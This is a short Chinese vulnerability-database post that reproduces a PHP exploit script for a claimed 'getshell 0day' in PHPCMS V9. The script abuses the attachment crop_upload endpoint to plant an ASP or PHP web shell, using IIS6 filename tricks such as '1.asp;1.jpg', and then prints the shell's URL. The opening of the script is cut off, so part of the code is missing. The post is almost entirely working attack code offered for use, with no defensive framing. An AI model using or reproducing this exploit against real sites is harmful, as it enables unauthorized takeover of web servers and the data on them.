PHPCMS V9 最新getshell漏洞
- 发表于
- Vulndb
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY
c0de by testr00ttest hackqing.com
针对iis6.0的漏洞 有点鸡肋 但是也可以用
apache 是老版本可能会产生问题
+---------------------------------------------------------------------------+
#!usr/bin/php -w
';
$aspshell='<%eval request("'.$pass.'")%>';
if($js==1){
$file="1.asp;1.jpg";
$ret=GetShell($url,$aspshell,$file);
}else if($js==2){
$file="1.php;1.jpg";
$ret=GetShell($url,$phpshell,$file);
}else if($js==3){
$file="1.php.jpg";
$ret=GetShell($url,$phpshell,$file);
}else{
print_r('没有选择脚本类型');
}
$pattern = "|http:\/\/[^,]+?\.jpg,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0]){
echo "\r\nurl地址:".$matches[0][0];
}else{
echo "\r\n没得到!";
}
function GetShell($url,$shell,$js){
$content =$shell;
$data = "POST /index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$url."/uploadfile/".$js." HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
//echo $data;
$ock=fsockopen($url,80);
if (!$ock) {
echo "No response from ".$url."\n";
}
fwrite($ock,$data);
$resp = '';
while (!feof($ock)) {
$resp.=fread($ock, 1024);
}
return $resp;
}
?>
原文连接:PHPCMS V9 最新getshell漏洞
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。